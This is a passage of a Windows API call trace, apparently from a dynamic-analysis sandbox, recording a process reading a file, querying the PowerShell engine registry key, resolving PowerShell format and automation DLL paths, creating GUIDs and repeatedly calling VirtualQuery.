[0079.759] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.760] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.760] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.760] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.760] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.760] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.761] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.761] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.761] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.762] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.762] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.762] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.762] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.762] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.762] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.763] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.763] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.763] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.763] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.763] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.763] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.763] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.765] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.765] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.766] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.766] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.766] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.766] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.766] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.766] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.767] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.767] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.767] ReadFile (in: hFile=0x30c, lpBuffer=0x36a1b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x36a1b58*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.768] SetErrorMode (uMode=0x1) returned 0x1
[0079.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cf80 | out: lpFileInformation=0x16cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
[0079.768] SetErrorMode (uMode=0x1) returned 0x1
[0079.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.768] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d068 | out: phkResult=0x16d068*=0x30c) returned 0x0
[0079.768] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfec, lpData=0x0, lpcbData=0x16cfe8*=0x0 | out: lpType=0x16cfec*=0x1, lpData=0x0, lpcbData=0x16cfe8*=0x56) returned 0x0
[0079.768] CoTaskMemAlloc (cb=0x5a) returned 0x2f9460
[0079.768] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfbc, lpData=0x2f9460, lpcbData=0x16cfb8*=0x56 | out: lpType=0x16cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16cfb8*=0x56) returned 0x0
[0079.768] CoTaskMemFree (pv=0x2f9460)
[0079.769] RegCloseKey (hKey=0x30c) returned 0x0
[0079.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.775] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xee0a4a79, Data2=0xedb0, Data3=0x4a35, Data4=([0]=0x81, [1]=0x5d, [2]=0xb4, [3]=0xd1, [4]=0xd, [5]=0xe2, [6]=0x76, [7]=0x41))) returned 0x0
[0079.776] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xa81bb8e0, Data2=0x83f1, Data3=0x403c, Data4=([0]=0xa7, [1]=0x79, [2]=0xd7, [3]=0x60, [4]=0x22, [5]=0x93, [6]=0x1a, [7]=0xc1))) returned 0x0
[0079.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.912] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x66fc3413, Data2=0x32b5, Data3=0x4598, Data4=([0]=0x9a, [1]=0x21, [2]=0x46, [3]=0x3e, [4]=0x5d, [5]=0x3f, [6]=0x70, [7]=0xdf))) returned 0x0
[0079.912] VirtualQuery (in: lpAddress=0x16b2a0, lpBuffer=0x16c160, dwLength=0x30 | out: lpBuffer=0x16c160*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.913] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.913] VirtualQuery (in: lpAddress=0x16bab0, lpBuffer=0x16c970, dwLength=0x30 | out: lpBuffer=0x16c970*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.913] VirtualQuery (in: lpAddress=0x16bab0, lpBuffer=0x16c970, dwLength=0x30 | out: lpBuffer=0x16c970*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.913] VirtualQuery (in: lpAddress=0x16bab0, lpBuffer=0x16c970, dwLength=0x30 | out: lpBuffer=0x16c970*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.914] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.914] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.914] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.914] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.914] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.914] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.914] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.915] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.915] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.915] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.915] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.915] VirtualQuery (in: lpAddress=0x16b6e0, lpBuffer=0x16c5a0, dwLength=0x30 | out: lpBuffer=0x16c5a0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.915] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.916] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.916] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.916] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.916] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x8d9153af, Data2=0x38ac, Data3=0x44ea, Data4=([0]=0xbd, [1]=0xa6, [2]=0x88, [3]=0x8e, [4]=0x68, [5]=0x6d, [6]=0x4, [7]=0xa7))) returned 0x0
[0079.917] VirtualQuery (in: lpAddress=0x16bab0, lpBuffer=0x16c970, dwLength=0x30 | out: lpBuffer=0x16c970*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.917] VirtualQuery (in: lpAddress=0x16bab0, lpBuffer=0x16c970, dwLength=0x30 | out: lpBuffer=0x16c970*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.917] VirtualQuery (in: lpAddress=0x16bab0, lpBuffer=0x16c970, dwLength=0x30 | out: lpBuffer=0x16c970*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.917] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.918] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.918] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.918] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.918] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.918] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.918] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.918] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.919] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.919] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.919] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.919] VirtualQuery (in: lpAddress=0x16b6e0, lpBuffer=0x16c5a0, dwLength=0x30 | out: lpBuffer=0x16c5a0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.919] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.919] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.920] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.920] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
